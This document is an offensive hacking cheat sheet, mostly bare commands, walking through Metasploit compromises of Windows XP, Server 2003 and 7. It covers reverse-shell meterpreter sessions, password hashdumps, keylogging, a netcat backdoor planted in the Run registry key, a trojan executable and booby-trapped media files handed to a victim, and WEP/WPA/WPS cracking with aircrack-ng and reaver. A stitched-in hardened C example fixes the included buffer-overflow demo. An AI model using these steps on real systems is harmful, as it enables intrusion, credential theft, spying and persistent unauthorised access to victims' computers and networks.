OR
set PAYLOAD windows/meterpreter/reverse_tcp [ Test other payload also ]
set LHOST 192.168.1.150 [Attacker Ip Address]
set LHOST [MY IP ADDRESS]
exploit
So we got a successful meterpreter session; it means you are remotely logged in to the XP OS.
Now use the help command to list the meterpreter commands.
Meterpreter Commands
meterpreter > getuid
meterpreter > ps
meterpreter > migrate 1444 [ migrate to that process which have admin privileges. ]
meterpreter > idletime
meterpreter > hashdump
meterpreter > screenshot
meterpreter > shell
> c:\> net user root *
> c:\> exit
Uploading Netcat :
meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\WINDOWS\SYSTEM32
meterpreter > reg enumkey -k HKLM\software\Microsoft\Windows\CurrentVersion\Run
meterpreter > reg setval -k HKLM\software\Microsoft\Windows\CurrentVersion\Run -v NETCAT -d 'C:\WINDOWS\system32\nc.exe -L -d -p 1234 -e cmd.exe'
meterpreter > reg enumkey -k HKLM\software\Microsoft\Windows\CurrentVersion\Run
Note : Netcat can be installed on Win XP, Vista and 7 [ Once netcat is installed successfully on the victim OS there is no need to exploit again; use the commands: ]
root@bt:~# nc <victim ip> <port>
root@bt:~# nc 192.168.217.141 1234
More Commands :
meterpreter > cat <file name>
meterpreter > download C:\<file name>
meterpreter > upload C:\<file name>
meterpreter > search -d C:\ *d
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
meterpreter > uictl disable keyboard
meterpreter > uictl enable keyboard
meterpreter > run [ press tab to show many more commands ]
meterpreter > run vnc
Creating Backdoor :
meterpreter > run metsvc [ most viruses and trojans work on port 31337 ]
meterpreter > background [ to go back ]
NOTE : What if our connection breaks or the victim patches his vulnerability? To connect with our "Backdoor" :-
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
show options
set rhost < victim >
set lport 31337 ---------> because our backdoor is working on port 31337.
exploit
meterpreter > run
meterpreter >
II. Windows Server 2003
Windows Server Hacking [ 2003 SP - 1,2 ]
RCE ( Netapi ) ( Remote Code Execution ) [ windows server 2003 SP-1,2,platinum ]
msfconsole
exploit/windows/smb/ms06_040_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [MY IP ADDRESS]
set RHOST [TARGET IP]
exploit
III. Windows 7
Windows 7 Hacking
(dot)EXE [ Trojan ] [ Hack Any Windows OS ]
root@#~/ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.17.128 LPORT=4444 X > /root/12345.exe
NOTE : Give 12345.exe [ virus ] to the victim
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost < Our Ip >
set lport 4444 ---------> because our virus is working on port 4444
exploit
meterpreter > run
IV. Browser Exploits
Autopwn [ combination of many exploits ] [See also : Java bean jmx17_jmxbean ]
use auxiliary/server/browser_autopwn
show options
set LHOST <My Ip >
set SRVHOST < My IP; the server is hosted on my computer, so again my IP >
set SRVPORT 80
set URIPATH /
exploit
VII. DLL Injection
1. Hack Windows 7 with Metasploit using Kali Linux.
Machine 1: Host Kali Linux machine
Machine 2: Target Windows 7 machine
msfconsole
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf > set payload windows/meterpreter/reverse_tcp
msf > show options
msf > set SRVHOST 192.168.31.20
msf > set LHOST 192.168.31.20
msf > exploit
msf > sessions
msf > sessions -i 1
meterpreter >
Buffer Overflow
#include <stdio.h>
#include <stdlib.h>   /* malloc, system */

int main(void)
{
    char *name;
    char *command;
    name = (char *)malloc(10);      /* 10-byte buffer for the name */
    command = (char *)malloc(128);  /* 128-byte buffer allocated right after it */
    printf("address of name is : %p\n", (void *)name);
    printf("address of command is : %p\n", (void *)command);
    printf("Difference between address is : %ld\n", (long)(command - name));
    printf("Enter your name");
    gets(name);                     /* unbounded read: a long name overruns into command (the bug being demonstrated) */
    printf("Hello %s\n", name);
    system(command);                /* runs whatever the overflow placed in command */
    return 0;
}
root@kali:~#
root@kali:~# gcc buffer.c -o buffer
root@kali:~# ./buffer
Eg: Output : 347582347y5823458723453425534523453452345234cat /etc/passwd
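The hardened counterpart of buffer.c, added here as an example (it is not from the original notes): read_name replaces gets with a bounded copy, command_survives rebuilds the two-buffer heap layout and confirms an oversized name no longer reaches the command buffer, and main never hands user input to system(). All function and buffer names are this example's own.

```c
/* Added example (not from the original notes): same 10-byte name / 128-byte
 * command layout as buffer.c, but the read is bounded so the name can never
 * spill into the neighbouring buffer, and user input never reaches system(). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_CAP 10   /* same sizes as buffer.c */
#define CMD_CAP  128

char name_buf[NAME_CAP];   /* bounded destination used by main() */

/* Bounded replacement for gets(name): copies at most cap-1 bytes and always
 * terminates. Returns 0 if the input fit, -1 if it had to be truncated. */
int read_name(char *dst, size_t cap, const char *input)
{
    size_t len = strlen(input);
    int truncated = len >= cap;
    if (truncated) len = cap - 1;
    memcpy(dst, input, len);
    dst[len] = '\0';
    return truncated ? -1 : 0;
}

/* Rebuild the heap layout of buffer.c, feed it an oversized name, and report
 * whether the command buffer is still intact (1) or was overwritten (0). */
int command_survives(const char *input)
{
    char *name = malloc(NAME_CAP), *command = malloc(CMD_CAP);
    if (!name || !command) { free(name); free(command); return 0; }
    strcpy(command, "echo harmless");   /* content chosen by the program, not the user */
    read_name(name, NAME_CAP, input);   /* never writes past NAME_CAP bytes */
    int ok = strcmp(command, "echo harmless") == 0;
    free(name); free(command);
    return ok;
}

int main(void)
{
    char line[256];
    printf("Enter your name: ");
    if (fgets(line, sizeof line, stdin) == NULL) return 1;
    line[strcspn(line, "\n")] = '\0';      /* drop the trailing newline */
    if (read_name(name_buf, NAME_CAP, line) != 0)
        printf("(name truncated to %d characters)\n", NAME_CAP - 1);
    printf("Hello %s\n", name_buf);
    return 0;   /* no system(): user input never reaches a shell */
}
```

Compile and run it with the same long input as above: the name is cut to nine characters and nothing is executed.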
1] Buffer Over Flow Attack On orbital_viewer
msfconsole
search bof
search orbital
use exploit/windows/fileformat/orbital_viewer_orb
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST <Our IP>
exploit
exit
Note : Give " msf.orb " to the victim now,
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost < Our Ip >
set lport 4444 ---------> because our virus is working on port 4444
exploit
meterpreter > run
II. Buffer Overflow In VLC Player
use exploit/windows/fileformat/vlc_modplug_s3m
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST <Our IP>
exploit
exit
Note : Give " msf.s3m " to the victim now,
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost < Our Ip >
set lport 4444 ---------> because our virus is working on port 4444
exploit
meterpreter > run
Wi-Fi Hacking
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver
1. WEP / WPA / WPA-2
WEP - Wired Equivalent Privacy
WEP keys are a sequence of hexadecimal digits.
These digits include the numbers 0-9 and the letters A-F.
Some examples of WEP keys are:
1A648C9FE2
99D767BAC38EA23B0C0176D152
The length of a WEP key depends on the type of WEP security (called "encryption") utilized:
40- or 64-bit WEP: 10 digit key
104- or 128-bit WEP: 26 digit key
256-bit WEP: 58 digit key
WPA-PSK - Wi-Fi Protected Access (Pre-Shared Key) security key
The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-bit keys used in the WEP system.
Temporal Key Integrity Protocol - TKIP
TKIP employs a per-packet key system that was radically more secure than the fixed key used in the WEP system.
TKIP was later superseded by the Advanced Encryption Standard (AES).
WPA2 - Wi-Fi Protected Access II
256-bit encryption, using a security key of either 64 hexadecimal digits or a passphrase of up to 63 ASCII characters.
2. Command Line
airmon-ng -> To put your network adapter in monitor mode.
airodump-ng -> Start monitoring and packet sniffing.
aireplay-ng -> To deauthenticate the user.
aircrack-ng -> To crack the key.
SSID - service set identifier (Name of Network)
BSSID - Base Station service set identifier -> BSSIDs identify access points and their clients (AP MAC address)
Hacking WEP From Backtrack Linux Terminal
step1 : airmon-ng start wlan0
step2 : airodump-ng mon0
step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0 --> Wait for at least 5000 packets
step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
For Kali Linux : aireplay-ng -c <STATION or Client> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --ignore-negative-one
step5 : aircrack-ng lab.cap
Hacking WPA & WPA2 From Backtrack Linux Terminal
step1 : airmon-ng start wlan0
step2 : airodump-ng mon0
step3 : airodump-ng --bssid 0C:D2:B5:01:AB:70 -c 12 -w lab mon0
step4 : aireplay-ng -c <STATION> -0 500 -a 0C:D2:B5:01:AB:70 mon0
> wait for at least one 4-way handshake
> For Kali Linux : aireplay-ng -c <STATION or client> -0 500 -a 0C:D2:B5:01:AB:70 mon0 --ignore-negative-one
step5 : aircrack-ng -w wordlist lab.cap
Hacking WPS From Backtrack Linux Terminal
Reaver : [ crack wep-wpa-wpa2 ]
wash -i mon0
[ to see if WPS is enabled or not ( it should be enabled ) ] means [ "wps locked option -- no" ]
reaver -i mon0 -b <BSSID> -S --no-nacks -d7 -vv -c 1
NOTE : If you already have the PIN :
reaver -i mon0 (or airoscript if you use a fake MAC) -b (bssid) -vv -c (channel) -e (name of AP) -p (wps pin)
Graphical Interface Tools For Wi-Fi Hacking
wifite
Gerix Wi-Fi Cracker
Fern Wi-Fi Cracker